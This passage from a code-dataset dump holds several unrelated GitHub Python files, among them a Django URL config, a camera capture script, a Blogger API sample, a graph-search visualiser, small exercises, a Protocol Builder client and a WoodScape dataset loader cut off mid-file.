name=\"related_videos\"),\n path(\"like_video//\", LikeVideo.as_view(), name=\"like_video\"),\n path(\"create_comment/\", CreateComment.as_view(), name=\"create_comment\"),\n path(\"video_comments//\", VideoComments.as_view(), name=\"video_comments\"),\n path(\n \"subscribe_channel//\",\n SubscribeVideoChannel.as_view(),\n name=\"subscribe_channel\",\n ),\n path(\n \"check_channel//\",\n SubscribeChannelCheck.as_view(),\n name=\"check_channel\",\n ),\n path(\"subscribed_videos/\", SubscribedVideos.as_view(), name=\"subscribed_videos\"),\n path(\"user_videos/\", UserVideos.as_view(), name=\"user_videos\"),\n path(\"discover_videos/\", DiscoverVideos.as_view(), name=\"discover_videos\"),\n path(\"most_watched/\", MostWatchedVideos.as_view(), name=\"most_watched\"),\n path(\"trending/\", Trending.as_view(), name=\"trending\"),\n path(\"most_popular/\", MostPopular.as_view(), name=\"most_popular\"),\n path(\"for_you/\", ForYou.as_view(), name=\"for_you\"),\n path(\"web_push/\", include(router.urls)),\n]\n","repo_name":"Doszhan-M/VideoHub","sub_path":"backend/backend/main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"20446280269","text":"\n\"\"\"\n拍照脚本\n\"\"\"\n\n\nimport cv2\nfrom MatrixHands.camera.camera import Camera\nimport winsound\nfrom MatrixHands.config import Config\nimport time\n\n\nif __name__ == \"__main__\":\n\n # 视频对象\n left_camera = Camera(Config[\"double_camera\"][0])\n right_camera = Camera(Config[\"double_camera\"][1])\n\n\n # 预计拍照时间(负数,绝对值越大,第一张图片等待时间越长)\n count = -200\n\n # 拍摄间隔(越大,间隔越大)\n wait = 60\n\n while True:\n\n # 获取一帧图片,两张图片,一左一右\n left_image, right_image = left_camera(), right_camera()\n\n\n # 显示\n cv2.imshow(\"Left Video\", left_image)\n cv2.imshow(\"Right Video\", right_image)\n\n count += 1\n\n if count == 60:\n count = 0\n # 用当前的时间戳命名\n name = str(time.time()) + \".jpg\"\n cv2.imwrite(\"../images/left/\" + name, left_image)\n cv2.imwrite(\"../images/right/\" + name, right_image)\n winsound.Beep(400, 300)\n print(name, \"已保存\")\n\n cv2.waitKey(1)\n","repo_name":"Magic-Matrix/MatrixVersion","sub_path":"script/photograph.py","file_name":"photograph.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"38119397354","text":"# 全数据模板\nd = {\n 'jinjia':{\"id\":'employeelist',\n \"name\": 'employeelist',\n \"css\":'table table-hover table-bordered',},\n 'route':{},\n 'data':{},\n\n \"colnames\": [],\n \"lang\":[],\n \"step\": 5,\n \"pages\": 1,\n \"data\":[]\n}\nimport sys,os\ne=os.getcwd()\ne3=os.walk(e)\nd=next(e3)\nos.path.join(d[0],d[1][3])\nclass Thebest():\n Jinjiadir=os.path.join(d[0],d[1][3])\n Routedir=e\n Database=e\n def __init__(self):\n pass\n method='GET'\n host='127.0.0.1'\n path='/'.join(e.split('\\\\'))\n file='testData.py'\n self.url='{} {}/{}/{}'.format(method,host,path,file)\n def createJinjia(self):\n n=1\n head='{{% block body{:02d} %}}'.format(n)\n last='{% endblock %}'\n print(head)\n text='测试资源'\n default='{} '.format(self.url,text)\n with open(os.path.join(self.Jinjiadir,'testjinjia.html'),'a',encoding='utf8') as f:\n f.write(head+default+last)\n def createRoute(self):\n with open(os.path.join(self.Routedir,'api.py'),'a',encoding='utf8') as f:\n f.write('')\n def createDatabase(self):\n with open(os.path.join(self.Database,'testDate.py'),'a',encoding='utf8') as f:\n f.write('')\n\nif __name__=='__main__':\n print(Thebest.Jinjiadir)\n print(Thebest.Routedir)\n print(Thebest.Database)\n t=Thebest()\n t.createDatabase()\n t.createJinjia()\n t.createRoute()\n","repo_name":"wangzheng62/CRMverson02","sub_path":"thebest.py","file_name":"thebest.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"39668283157","text":"from __future__ import print_function\n\n__author__ = \"jcgregorio@google.com (Joe Gregorio)\"\n\nimport sys\n\nfrom oauth2client import client\nfrom googleapiclient import sample_tools\n\n\ndef main(argv):\n # Authenticate and construct service.\n service, flags = sample_tools.init(\n argv,\n \"blogger\",\n \"v3\",\n __doc__,\n __file__,\n scope=\"https://www.googleapis.com/auth/blogger\",\n )\n\n try:\n\n users = service.users()\n\n # Retrieve this user's profile information\n thisuser = users.get(userId=\"self\").execute()\n print(\"This user's display name is: %s\" % thisuser[\"displayName\"])\n\n blogs = service.blogs()\n\n # Retrieve the list of Blogs this user has write privileges on\n thisusersblogs = blogs.listByUser(userId=\"self\").execute()\n for blog in thisusersblogs[\"items\"]:\n print(\"The blog named '%s' is at: %s\" % (blog[\"name\"], blog[\"url\"]))\n\n posts = service.posts()\n\n # List the posts for each blog this user has\n for blog in thisusersblogs[\"items\"]:\n print(\"The posts for %s:\" % blog[\"name\"])\n request = posts.list(blogId=blog[\"id\"])\n while request != None:\n posts_doc = request.execute()\n if \"items\" in posts_doc and not (posts_doc[\"items\"] is None):\n for post in posts_doc[\"items\"]:\n print(\" %s (%s)\" % (post[\"title\"], post[\"url\"]))\n request = posts.list_next(request, posts_doc)\n\n except client.AccessTokenRefreshError:\n print(\n \"The credentials have been revoked or expired, please re-run\"\n \"the application to re-authorize\"\n )\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","repo_name":"googleapis/google-api-python-client","sub_path":"samples/blogger/blogger.py","file_name":"blogger.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":7007,"dataset":"github-code","pt":"69"}
+{"seq_id":"20022954972","text":"import networkx as nx\r\nimport matplotlib.pyplot as plt\r\nimport random\r\nfrom matplotlib.widgets import Button\r\nfrom matplotlib.widgets import AxesWidget\r\nfrom matplotlib.widgets import RadioButtons\r\nfrom matplotlib.widgets import TextBox\r\n#from matplotlib.widgets import Slider\r\n\r\n \r\n################ Drawing the Graph, options as radio buttons and etc. ################\r\n\r\n#Define the graph along with its nodes and their positions ;\r\nX = nx.Graph()\r\nfor i in range (1,6) :\r\n for j in range (0, i + 6):\r\n k = i * 7 + j - 6\r\n if (k < 36):\r\n X.add_node(k, pos = (j, i - 1))\r\n\r\npos=nx.get_node_attributes(X,'pos')\r\n\r\n#Making a list of 58 random numbers from 1 to 100 as the weights of the graph's edges ;\r\nmy_randoms = random.sample(range(1,101), 100)\r\ndel my_randoms[58:100]\r\n\r\n#Setting edges of the graph and assigning weights to each one ;\r\ni = 0\r\nfor j in range (1, 35) :\r\n if j % 7 != 0 :\r\n X.add_edge(j, j + 1, weight = my_randoms[i])\r\n i = i + 1\r\n if j < 29:\r\n X.add_edge(j, j + 7, weight = my_randoms[i])\r\n i = i + 1\r\n\r\nlabels = nx.get_edge_attributes(X,'weight')\r\n\r\n#Determine the location of the graph in the plot ;\r\nx_place = plt.axes([0.12, 0.01, 0.87, 0.88])\r\n\r\n#Drawing the graph\r\nnx.draw_networkx_nodes(X,pos,node_size=600, node_color='g', alpha=0.4, node_shape='s')\r\nnx.draw_networkx_labels(X, pos, font_size = 8, font_weight = 'heavy')\r\n\r\nnx.draw_networkx_edges(X, pos, width = 1.5, edg_color = 'r', style = 'dotted', alpha = 0.3)\r\nnx.draw_networkx_edge_labels(X, pos, edge_labels = labels, font_size = 7)\r\n\r\n#A class to make radio buttons display horizontally\r\nclass MyRadioButtons(RadioButtons):\r\n\r\n def __init__(self, ax, labels, active=0, activecolor='blue', size=49,\r\n orientation=\"vertical\", **kwargs):\r\n \r\n AxesWidget.__init__(self, ax)\r\n self.activecolor = activecolor\r\n axcolor = ax.get_facecolor()\r\n self.value_selected = None\r\n\r\n ax.set_xticks([])\r\n ax.set_yticks([])\r\n ax.set_navigate(False)\r\n\r\n circles = []\r\n for i, label in enumerate(labels):\r\n if i == active:\r\n self.value_selected = label\r\n facecolor = activecolor\r\n else:\r\n facecolor = axcolor\r\n p = ax.scatter([],[], s=size, marker=\"o\", edgecolor='black',\r\n facecolor=facecolor)\r\n circles.append(p)\r\n if orientation == \"horizontal\":\r\n kwargs.update(ncol=len(labels), mode=\"expand\")\r\n kwargs.setdefault(\"frameon\", False) \r\n self.box = ax.legend(circles, labels, loc=\"center\", **kwargs)\r\n self.labels = self.box.texts\r\n self.circles = self.box.legendHandles\r\n for c in self.circles:\r\n c.set_picker(5)\r\n self.cnt = 0\r\n self.observers = {}\r\n\r\n self.connect_event('pick_event', self._clicked)\r\n\r\n def _clicked(self, event):\r\n if (self.ignore(event) or event.mouseevent.button != 1 or\r\n event.mouseevent.inaxes != self.ax):\r\n return\r\n if event.artist in self.circles:\r\n self.set_active(self.circles.index(event.artist))\r\n\r\n#Initializing \"start node\" and \"goal node\" as their default values + receiving values entered by the user ;\r\nstart_node = 1\r\ndef submit_start(submit):\r\n global start_node\r\n start_node = submit\r\n\r\ngoal_node = 35\r\ndef submit_goal(submit):\r\n global goal_node\r\n goal_node = submit\r\n\r\npreferred_depth = 2\r\ndef submit_depth(submit):\r\n global preferred_depth\r\n preferred_depth = submit\r\n\r\n#Setting the default method of search + setting it according to what user has chosen ;\r\nsearch_method = 
1\r\n\r\ndef methodFunc(lable):\r\n global search_method\r\n if lable == 'Breadth-First Search' :\r\n search_method = 1\r\n if lable == 'Depth-First Search' :\r\n search_method = 2\r\n elif lable == 'Uniform Cost Search' :\r\n search_method = 3\r\n elif lable == 'Iterative Deepening Depth-First Search' :\r\n search_method = 4\r\n\r\n#Setting search method options as radio buttons by determining their place on the plot and setting their texts ; \r\nplt.subplots_adjust(left=0.2)\r\nradios_place = plt.axes([0.12,0.9,0.87,0.05])\r\n#plt.text(- 0.068, - 0.05, \"Choose a method :\\n\")\r\nradio_buttons = MyRadioButtons(radios_place ,['Breadth-First Search','Depth-First Search','Uniform Cost Search', 'Iterative Deepening Depth-First Search'], active=0, activecolor='black',\r\n orientation=\"horizontal\")\r\nradio_buttons.on_clicked(methodFunc)\r\n\r\n#Defining a text-box for inputting start node by the user (sends input data to \"submit_start\" function (line 96))\r\nstartbox_place = plt.axes([0.07, 0.8, 0.03, 0.05])\r\ntext_box1 = TextBox(startbox_place,'', initial = '1')\r\nplt.text(-1.7, 1.0, \"Start :\\n\")\r\ntext_box1.on_submit(submit_start)\r\n\r\n#Defining a text-box for inputting goal node by the user (sends input data to \"submit_goal\" function (line 101))\r\ngoalbox_place = plt.axes([0.07, 0.7, 0.03, 0.05])\r\ntext_box2 = TextBox(goalbox_place,'', initial = '35')\r\nplt.text(-1.7, 1.0, \"Goal :\\n\")\r\ntext_box2.on_submit(submit_goal)\r\n\r\n#Defining a text-box for inputting depth limit by the user (sends input data to \"preferred_depth\" function (line 106))\r\npreferredDepthBox_place = plt.axes([0.07, 0.6, 0.03, 0.05])\r\ntext_box3 = TextBox(preferredDepthBox_place,'')#, initial = '2')\r\nplt.text(-1.7, 1.0, \"Depth limit :\\n\")\r\ntext_box3.on_submit(submit_depth)\r\n\r\n#Defining a button for searching proccess to start whenever user clicked it ;\r\nsearchButton_place = plt.axes([0.04, 0.5, 0.06, 0.05])\r\nsearchButton = Button(searchButton_place, 'Search', color = 'pink', hovercolor = 'grey')\r\n\r\n#######################################################################\r\n\r\n################ Define required functions and classes ################\r\n\r\n#Tree Class ;\r\n\r\nclass Tree(object) :\r\n def __init__(self, lable, parent) :\r\n self.lable = lable\r\n self.children = []\r\n self.parent = parent\r\n self.depth = 0\r\n\r\n if self.parent == None :\r\n self.depth = 0\r\n else :\r\n self.depth = parent.depth + 1\r\n\r\n def addChildren(self) :\r\n neighbors_list = list(X.neighbors(self.lable))\r\n if self.parent == None :\r\n self.children = []\r\n for f in range(len(neighbors_list)) :\r\n aChild = Tree(neighbors_list[f], self)\r\n self.children.append(aChild)\r\n\r\n else :\r\n self.children = []\r\n for f in range(len(neighbors_list)) :\r\n if neighbors_list[f] != self.parent.lable :\r\n aChild = Tree(neighbors_list[f], self)\r\n self.children.append(aChild)\r\n def getCost(self) :\r\n sample_node = self\r\n sample_node_cost = 0\r\n while sample_node.parent != None :\r\n weightDic = X.get_edge_data(sample_node.lable, sample_node.parent.lable)\r\n sample_node_cost = sample_node_cost + int(weightDic['weight'])\r\n sample_node = sample_node.parent\r\n return sample_node_cost\r\n\r\n\r\n#Depth Class ;\r\n\r\nclass Depth(object) :\r\n def __init__(self, level) :\r\n self.level = level\r\n self.members = []\r\n\r\n def addMember(self, node) :\r\n self.members.append(node)\r\n\r\n#Breadth-First search function ;\r\ndef breadthFirst_search(startNode, goalNode) :\r\n \r\n found 
= 'no'\r\n \r\n current_searchin_node = Tree(int(startNode), None)\r\n \r\n current_searchin_depth = Depth(0)\r\n current_searchin_depth.addMember(current_searchin_node)\r\n next_searchin_depth = Depth(1)\r\n\r\n while found == 'no' :\r\n current_searchin_node.addChildren()\r\n for m in range(len(current_searchin_node.children)):\r\n next_searchin_depth.addMember(current_searchin_node.children[m])\r\n if int(goalNode) == current_searchin_node.children[m].lable :\r\n found = 'yes'\r\n break\r\n if found == 'yes' :\r\n break\r\n else :\r\n if current_searchin_node == current_searchin_depth.members[len(current_searchin_depth.members) - 1] :\r\n current_searchin_node = next_searchin_depth.members[0]\r\n del(current_searchin_depth)\r\n current_searchin_depth = next_searchin_depth\r\n next_searchin_depth = Depth(current_searchin_node.depth + 1)\r\n\r\n else :\r\n for h in range(len(next_searchin_depth.members)):\r\n if current_searchin_node == current_searchin_depth.members[h] :\r\n current_searchin_node = current_searchin_depth.members[h + 1]\r\n break\r\n\r\n ansList = [] \r\n if found == 'yes' :\r\n ansList.append(int(goalNode))\r\n while current_searchin_node != None:\r\n ansList.append(current_searchin_node.lable)\r\n current_searchin_node = current_searchin_node.parent\r\n return ansList\r\n\r\n\r\n#Depth-First search function ; \r\ndef depthFirst_search(startNode, goalNode) :\r\n \r\n found = 'no'\r\n\r\n current_searchin_node = Tree(int(startNode), None)\r\n current_searchin_node.addChildren()\r\n\r\n while found == 'no' :\r\n while len(current_searchin_node.children) != 0:\r\n for m in range(len(current_searchin_node.children)):\r\n if int(goalNode) == current_searchin_node.children[m].lable :\r\n found = 'yes'\r\n break\r\n if found == 'yes' :\r\n break\r\n else :\r\n current_searchin_node = current_searchin_node.children[0]\r\n current_searchin_node.addChildren()\r\n\r\n if found == 'yes' :\r\n break\r\n if len(current_searchin_node.children) == 0 :\r\n goodOne = 0\r\n while goodOne == 0 :\r\n for h in range(len(current_searchin_node.parent.children)):\r\n if current_searchin_node == current_searchin_node.parent.children[h] :\r\n if h + 1 < len(current_searchin_node.parent.children) :\r\n current_searchin_node = current_searchin_node.parent.children[h + 1]\r\n current_searchin_node.addChildren()\r\n goodOne = 1\r\n break\r\n if h == len(current_searchin_node.parent.children) - 1 :\r\n current_searchin_node = current_searchin_node.parent\r\n\r\n ansList = []\r\n if found == 'yes' :\r\n ansList.append(int(goalNode))\r\n while current_searchin_node != None:\r\n ansList.append(current_searchin_node.lable)\r\n current_searchin_node = current_searchin_node.parent\r\n return ansList\r\n\r\n\r\n#Uniform cost search function ; \r\ndef uniformCost_search(startNode, goalNode) :\r\n\r\n found = 'no'\r\n \r\n current_searchin_node = Tree(int(startNode), None)\r\n \r\n notSearchedNodes_List = []\r\n sample_node = current_searchin_node\r\n\r\n while found == 'no' :\r\n current_searchin_node.addChildren()\r\n for m in range(len(current_searchin_node.children)):\r\n if int(goalNode) == current_searchin_node.children[m].lable :\r\n found = 'yes'\r\n break\r\n notSearchedNodes_List.append(current_searchin_node.children[m])\r\n current_searchin_node.children[m].parent = sample_node\r\n sample_node.children.append(current_searchin_node.children[m])\r\n if found == 'yes' :\r\n break\r\n\r\n indx = 0\r\n leastCost = notSearchedNodes_List[0].getCost()\r\n for f in range(len(notSearchedNodes_List)) :\r\n 
sample_cost = notSearchedNodes_List[f].getCost()\r\n if sample_cost < leastCost :\r\n leastCost = sample_cost\r\n indx = f\r\n current_searchin_node = notSearchedNodes_List[indx]\r\n sample_node = current_searchin_node\r\n for l in range(len(current_searchin_node.parent.children)) :\r\n if current_searchin_node.parent.children[l] == current_searchin_node :\r\n current_searchin_node.parent.children[l] = sample_node\r\n break\r\n\r\n del notSearchedNodes_List[indx]\r\n\r\n ansList = []\r\n if found == 'yes' :\r\n ansList.append(int(goalNode))\r\n while current_searchin_node != None:\r\n ansList.append(current_searchin_node.lable)\r\n current_searchin_node = current_searchin_node.parent\r\n return ansList\r\n\r\n\r\n#Iterative deepening depth-first search function ; \r\ndef IterativeDeepeningDF_search(startNode, goalNode, preferredDepth) :\r\n \r\n found = 'no'\r\n\r\n current_searchin_node = Tree(int(startNode), None)\r\n current_searchin_node.addChildren()\r\n\r\n while found == 'no' :\r\n while len(current_searchin_node.children) != 0:\r\n if current_searchin_node.depth == int(preferredDepth) :\r\n current_searchin_node.children = []\r\n break\r\n for m in range(len(current_searchin_node.children)):\r\n if int(goalNode) == current_searchin_node.children[m].lable :\r\n found = 'yes'\r\n break\r\n if found == 'yes' :\r\n break\r\n else :\r\n current_searchin_node = current_searchin_node.children[0]\r\n current_searchin_node.addChildren()\r\n\r\n if found == 'yes' :\r\n break\r\n if len(current_searchin_node.children) == 0 :\r\n goodOne = 0\r\n while goodOne == 0 :\r\n if current_searchin_node.parent != None :\r\n for h in range(len(current_searchin_node.parent.children)):\r\n if current_searchin_node == current_searchin_node.parent.children[h] :\r\n if h + 1 < len(current_searchin_node.parent.children) :\r\n current_searchin_node = current_searchin_node.parent.children[h + 1]\r\n current_searchin_node.addChildren()\r\n goodOne = 1\r\n break\r\n if h == len(current_searchin_node.parent.children) - 1 :\r\n current_searchin_node = current_searchin_node.parent\r\n\r\n ansList = []\r\n if found == 'yes' :\r\n ansList.append(int(goalNode))\r\n while current_searchin_node != None:\r\n ansList.append(current_searchin_node.lable)\r\n current_searchin_node = current_searchin_node.parent\r\n return ansList\r\n\r\n\r\ndef on_button_clicked(event):\r\n #clears the axes where the graph is placed\r\n plt.axes([0.12, 0.01, 0.87, 0.88])\r\n plt.cla()\r\n\r\n #draws the graph again \r\n nx.draw_networkx_nodes(X,pos,node_size=600, node_color='g', alpha=0.4, node_shape='s')\r\n nx.draw_networkx_labels(X, pos, font_size = 8, font_weight = 'heavy')\r\n\r\n nx.draw_networkx_edges(X, pos, width = 1.5, edg_color = 'r', style = 'dotted', alpha = 0.3)\r\n nx.draw_networkx_edge_labels(X, pos, edge_labels = labels, font_size = 7)\r\n \r\n ans_list = []\r\n\r\n if start_node == goal_node:\r\n ans_list.append(int(start_node))\r\n\r\n elif search_method == 1 :\r\n ans_list = breadthFirst_search(start_node, goal_node)\r\n\r\n elif search_method == 2 :\r\n ans_list = depthFirst_search(start_node, goal_node)\r\n\r\n elif search_method == 3 :\r\n ans_list = uniformCost_search(start_node, goal_node)\r\n \r\n elif search_method == 4 :\r\n global preferred_depth\r\n ans_list = IterativeDeepeningDF_search(start_node, goal_node, preferred_depth)\r\n\r\n #colors the navigated nodes\r\n plt.axes([0.12, 0.01, 0.87, 0.88])\r\n nx.draw_networkx_nodes(X, pos, node_size=600, nodelist = ans_list, node_color = '#84D7F5', 
node_shape='s')\r\n\r\ndef main() :\r\n searchButton.on_clicked(on_button_clicked)\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\nplt.show()","repo_name":"zeinabyari/graph","sub_path":"AI_graph_proj_01_96103214_CODE.py","file_name":"AI_graph_proj_01_96103214_CODE.py","file_ext":"py","file_size_in_byte":15995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
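The hand-rolled breadth-first and uniform-cost searches above can be sanity-checked against networkx's built-ins on a small weighted graph; a minimal sketch (the three-node graph is illustrative, not the 35-node grid from the record).

```python
import networkx as nx

G = nx.Graph()
G.add_weighted_edges_from([(1, 2, 5), (2, 3, 1), (1, 3, 10)])

# Fewest-edges path, which breadthFirst_search should agree with:
print(nx.shortest_path(G, 1, 3))                   # [1, 3]
# Least total weight, which uniformCost_search should agree with:
print(nx.dijkstra_path(G, 1, 3, weight="weight"))  # [1, 2, 3]
```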
+{"seq_id":"70529189021","text":"import re\ndef is_all_upper(text: str) -> bool:\n # your code here\n test = r\"[a-z]*\"\n test2 = r\"[A-Z]*\"\n if text.isupper():\n return True\n elif re.match(test, text):\n return False\n else:\n return True\n\nif __name__ == '__main__':\n print(\"Example:\")\n print(is_all_upper('ALL UPPER'))\n print(is_all_upper(' '))\n\n # These \"asserts\" are used for self-checking and not for an auto-testing\n assert is_all_upper('ALL UPPER') == True\n assert is_all_upper('all lower') == False\n assert is_all_upper('mixed UPPER and lower') == False\n # assert is_all_upper('') == True\n print(\"Coding complete? Click 'Check' to earn cool rewards!\")\n\n\n\ntest = r\"[a-z]{6}\"\ntest2 = r\"[A-Z]*\"\n\nprint(bool(re.findall(test, \"text\")))\n","repo_name":"Kapitan/test.py","sub_path":"try.py","file_name":"try.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"20477298541","text":"\"\"\" \n@Author: huuuuusy\n@GitHub: https://github.com/huuuuusy\n系统: Ubuntu 18.04\nIDE: VS Code 1.36\n工具: python == 3.7.3\n\"\"\"\n\n\"\"\"\n思路:\n 两轮循环,暴力解法\n 从左到右遍历数组,left[i]存储i左边所有元素的和\n 然后再次循环,计算出右边元素之和,然后和左边元素比较,判断返回值\n结果:\n 执行用时 : 84 ms, 在所有 Python3 提交中击败了52.61%的用户\n 内存消耗 : 14 MB, 在所有 Python3 提交中击败了88.38%的用户\n\"\"\"\n\nclass Solution:\n def pivotIndex(self, nums):\n left = []\n sum = 0\n # 对每个元素,计算其左边元素的和,然后存入列表\n for num in nums:\n sum += num\n left.append(sum - num)\n # 计算右边元素的和,与左边元素比较\n for i in range(len(nums)):\n left_sum = left[i]\n rigth_sum = sum - left_sum - nums[i]\n if left_sum == rigth_sum:\n return i\n return -1\n\nif __name__ == \"__main__\":\n nums = [1, 7, 3, 6, 5, 6]\n answer = Solution().pivotIndex(nums)\n print(answer)\n ","repo_name":"new007008/Programming-Practice-Everyday","sub_path":"LeetCode Python/0724-寻找数组的中心索引*/V1.py","file_name":"V1.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"24384894760","text":"import json\nfrom json import JSONDecodeError\nfrom typing import List, Optional\n\nimport requests\n\nfrom crc import app\nfrom crc.api.common import ApiError\nfrom crc.models.protocol_builder import ProtocolBuilderCreatorStudySchema, ProtocolBuilderRequiredDocument\n\n\nclass ProtocolBuilderService(object):\n STUDY_URL = app.config['PB_USER_STUDIES_URL']\n INVESTIGATOR_URL = app.config['PB_INVESTIGATORS_URL']\n REQUIRED_DOCS_URL = app.config['PB_REQUIRED_DOCS_URL']\n STUDY_DETAILS_URL = app.config['PB_STUDY_DETAILS_URL']\n SPONSORS_URL = app.config['PB_SPONSORS_URL']\n IRB_INFO_URL = app.config['PB_IRB_INFO_URL']\n CHECK_STUDY_URL = app.config['PB_CHECK_STUDY_URL']\n PRE_REVIEW_URL = app.config['PB_PRE_REVIEW_URL']\n\n @staticmethod\n def is_enabled():\n if isinstance(app.config['PB_ENABLED'], str):\n return app.config['PB_ENABLED'].lower() == \"true\"\n else:\n return app.config['PB_ENABLED'] is True\n\n @staticmethod\n def get_studies(user_id) -> {}:\n ProtocolBuilderService.__enabled_or_raise()\n if not isinstance(user_id, str):\n raise ApiError(\"protocol_builder_error\", \"This user id is invalid: \" + str(user_id))\n url = ProtocolBuilderService.STUDY_URL % user_id\n response = requests.get(url)\n if response.ok and response.text:\n try:\n pb_studies = ProtocolBuilderCreatorStudySchema(many=True).loads(response.text)\n return pb_studies\n except JSONDecodeError as err:\n raise ApiError(\"protocol_builder_error\",\n \"Received an invalid response from the protocol builder. The response is not \"\n \"valid json. Url: %s, Response: %s, error: %s\" %\n (url, response.text, err.msg))\n else:\n raise ApiError(\"protocol_builder_error\",\n \"Received an invalid response from the protocol builder (status %s): %s\" %\n (response.status_code, response.text))\n\n @staticmethod\n def get_investigators(study_id) -> {}:\n return ProtocolBuilderService.__make_request(study_id, ProtocolBuilderService.INVESTIGATOR_URL)\n\n @staticmethod\n def get_required_docs(study_id) -> Optional[List[ProtocolBuilderRequiredDocument]]:\n return ProtocolBuilderService.__make_request(study_id, ProtocolBuilderService.REQUIRED_DOCS_URL)\n\n @staticmethod\n def get_study_details(study_id) -> {}:\n return ProtocolBuilderService.__make_request(study_id, ProtocolBuilderService.STUDY_DETAILS_URL)\n\n @staticmethod\n def get_irb_info(study_id) -> {}:\n return ProtocolBuilderService.__make_request(study_id, ProtocolBuilderService.IRB_INFO_URL)\n\n @staticmethod\n def get_sponsors(study_id) -> {}:\n return ProtocolBuilderService.__make_request(study_id, ProtocolBuilderService.SPONSORS_URL)\n\n @staticmethod\n def check_study(study_id) -> {}:\n return ProtocolBuilderService.__make_request(study_id, ProtocolBuilderService.CHECK_STUDY_URL)\n\n @staticmethod\n def get_pre_reviews(study_id) -> {}:\n return ProtocolBuilderService.__make_request(study_id, ProtocolBuilderService.PRE_REVIEW_URL)\n\n @staticmethod\n def __enabled_or_raise():\n if not ProtocolBuilderService.is_enabled():\n raise ApiError(\"protocol_builder_disabled\", \"The Protocol Builder Service is currently disabled.\")\n\n @staticmethod\n def __make_request(study_id, url):\n ProtocolBuilderService.__enabled_or_raise()\n if not isinstance(study_id, int):\n raise ApiError(\"invalid_study_id\", \"This study id is invalid: \" + str(study_id))\n response = requests.get(url % study_id)\n if response.ok and response.text:\n return json.loads(response.text)\n else:\n raise ApiError(\"protocol_builder_error\",\n \"Received an invalid 
response from the protocol builder (status %s): %s when calling \"\n \"url '%s'.\" %\n (response.status_code, response.text, url))\n","repo_name":"sartography/cr-connect-workflow","sub_path":"crc/services/protocol_builder.py","file_name":"protocol_builder.py","file_ext":"py","file_size_in_byte":4135,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"69"}
+{"seq_id":"39202832462","text":"from typing import Optional, Any, Callable\nimport os\nimport glob\nimport torch\nimport random\nfrom torch.utils.data import Dataset\nimport torchvision\nfrom torchvision import transforms\nfrom torch.utils.data.sampler import SubsetRandomSampler\nfrom torch.utils.data import DataLoader\nimport PIL\nimport PIL.Image\nimport numpy as np\nfrom pytorch_lightning import LightningDataModule\nimport pytorch_lightning as pl\nimport torchmetrics\nimport albumentations as A\nfrom albumentations.pytorch import ToTensorV2\nfrom .synthetic_anomalies import AnomalyMud\nfrom icecream import ic\n\n\nclass WoodScapeDataset(Dataset):\n def __init__(\n self,\n dataset_dir: str,\n img_size: tuple = (150, 300),\n n_classes: int = 10,\n default_transforms=False,\n img_transforms=None,\n label_transforms=None,\n img_mask_transforms=None,\n label_colours=None,\n ) -> None:\n super().__init__()\n self.class_names = [\n \"void\",\n \"road\",\n \"lanemarks\",\n \"curb\",\n \"person\",\n \"rider\",\n \"vehicles\",\n \"bicycle\",\n \"motorcycle\",\n \"traffic_sign\",\n ]\n\n self.n_classes = n_classes\n\n self.class_colors_rgb = [\n [0, 0, 0],\n [255, 0, 255],\n [0, 0, 255],\n [0, 255, 0],\n [255, 0, 0],\n [255, 255, 255],\n [0, 255, 255],\n [255, 255, 0],\n [255, 128, 128],\n [128, 128, 0],\n ] # RGB format!\n\n self.class_colors_bgr = [\n [0, 0, 0],\n [255, 0, 255],\n [255, 0, 0],\n [0, 255, 0],\n [0, 0, 255],\n [255, 255, 255],\n [255, 255, 0],\n [0, 255, 255],\n [128, 128, 255],\n [0, 128, 128],\n ] # BGR format!\n\n if label_colours is None:\n self.label_colours = dict(zip(range(10), self.class_colors_rgb))\n\n else:\n self.label_colours = label_colours\n\n self.class_indexes = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\n\n self.dataset_dir = dataset_dir\n self.rgb_images_dir = os.path.join(self.dataset_dir, \"rgb_images\")\n self.rgb_images_list = glob.glob(os.path.join(self.rgb_images_dir, \"*.png\"))\n self.rgb_images_list.sort()\n self.semantic_annotations_dir = os.path.join(self.dataset_dir, \"semantic_annotations\")\n self.semantic_annotations_gt_dir = os.path.join(self.semantic_annotations_dir, \"gtLabels\")\n self.semantic_annotations_rgb_dir = os.path.join(self.semantic_annotations_dir, \"rgbLabels\")\n self.semantic_annotations_gt_list = glob.glob(\n os.path.join(self.semantic_annotations_gt_dir, \"*.png\")\n )\n self.semantic_annotations_gt_list.sort()\n self.semantic_annotations_rgb_list = glob.glob(\n os.path.join(self.semantic_annotations_rgb_dir, \"*.png\")\n )\n self.semantic_annotations_rgb_list.sort()\n\n self.img_size = img_size\n if self.img_size is None:\n self.img_size = (150, 300)\n\n self.default_transforms = default_transforms\n self.img_mask_transforms = img_mask_transforms\n\n if self.default_transforms: # default transforms is True\n self.img_transforms = transforms.Compose(\n [\n transforms.Resize(self.img_size),\n transforms.ToTensor(),\n transforms.Normalize(\n mean=[0.32757252, 0.33050337, 0.33689716],\n std=[0.20290555, 0.20525302, 0.2037721],\n ),\n ]\n )\n self.label_transforms = transforms.Compose([transforms.Resize(self.img_size)])\n\n else: # default transforms is False\n self.img_transforms = img_transforms\n self.label_transforms = label_transforms\n\n def __len__(self):\n \"\"\"__len__\"\"\"\n return len(self.rgb_images_list)\n\n def __getitem__(self, index):\n # get image path\n img_path = self.rgb_images_list[index]\n gt_label_path = self.semantic_annotations_gt_list[index]\n\n image = PIL.Image.open(img_path).convert(\"RGB\")\n gt_label = 
